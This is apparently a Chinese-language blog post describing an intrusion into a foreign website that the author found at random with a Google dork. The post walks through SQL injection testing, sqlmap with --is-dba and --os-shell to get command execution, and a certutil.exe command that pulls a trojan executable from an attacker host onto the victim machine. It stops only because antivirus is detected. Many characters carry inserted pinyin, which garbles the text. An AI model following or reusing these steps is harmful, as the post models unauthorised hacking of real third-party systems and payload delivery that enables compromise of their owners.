0x00:尋找漏洞點(diǎn)

某天閑著無(wú)聊用谷歌語(yǔ)法inurl:aspx?id=找到一個(gè)國(guó)外的某個(gè)站點(diǎn)。功能點(diǎn)比較簡(jiǎn)單只有一個(gè)User ID:

0x01:檢測(cè)功能點(diǎn)

由于只有搜索框我們先來(lái)一個(gè)單引號(hào)看他是否報(bào)錯(cuò)報(bào)。

我們發(fā)現(xiàn)報(bào)錯(cuò)了單引號(hào)，我們?cè)賮?lái)一個(gè)單引號(hào)測(cè)試一下看看能不能回顯,頁(yè)面正常。

我們發(fā)現(xiàn)隨便輸入點(diǎn)內(nèi)容網(wǎng)站回顯正常提示xxxx。說(shuō)明有可能存在sql注入，我們繼續(xù)往下看。

0x02:信息收集

這里利用火狐瀏覽器的WAppalyzer插件看了一下網(wǎng)站信息。IIS版本為7.5有文件上傳IIS解析漏洞。

下面是用在線網(wǎng)站探查到的端口情況,還開一個(gè)1433端口。

0x03:Burp抓包+sqlmap檢測(cè)

既然剛才前面的輸入框會(huì)引起報(bào)錯(cuò)有可能存在sql注入那我是否可以考慮抓個(gè)數(shù)據(jù)包放到sqlmap里面跑跑看能不能跑出一些關(guān)鍵信息。下面利用Burp抓到包然后保存為x.txt。這里們加*號(hào)就是指定注入點(diǎn)。

放到sqlmap里面,已經(jīng)提示可以注入。

我們繼續(xù)往下看,下面是注入點(diǎn)。

有堆疊注入我們看看堆疊可以直接sqlmap --is-dba 看看是不是管理員權(quán)限如果我們可以利用sqlmap –-os-shelll 直接寫入木馬 拿到webshell或者反彈shell直接

這里看到dba的權(quán)限為True代表有機(jī)會(huì)寫入一句話從而獲取到也給低權(quán)限的shell。

這里可以直接sqlmap –os-shell,當(dāng)出現(xiàn)os-shell的時(shí)候代表成功。

我們輸入一條ipconfig簡(jiǎn)單命令看看能不能執(zhí)行成功。然后判斷目標(biāo)是否出網(wǎng)！如果不出網(wǎng)那傳木馬上去就扯犢子了，可以選擇傳webshell。

我們可以看到命令可以執(zhí)行

接下可以使用certutil.exe去接收一個(gè)惡意的文件。

命令certutil.exe -urlcache -split -f http:
//192.168.163.128:8080/artifact.exe c:artifact.exe // c:artifact.exe是保存路徑

這條命令遠(yuǎn)程下載文件木馬保存到受害機(jī)上去

先查看一下當(dāng)前的進(jìn)程。

然后使用在線的殺毒識(shí)別。結(jié)果發(fā)現(xiàn)還真有防護(hù)，就此放棄。。。。。。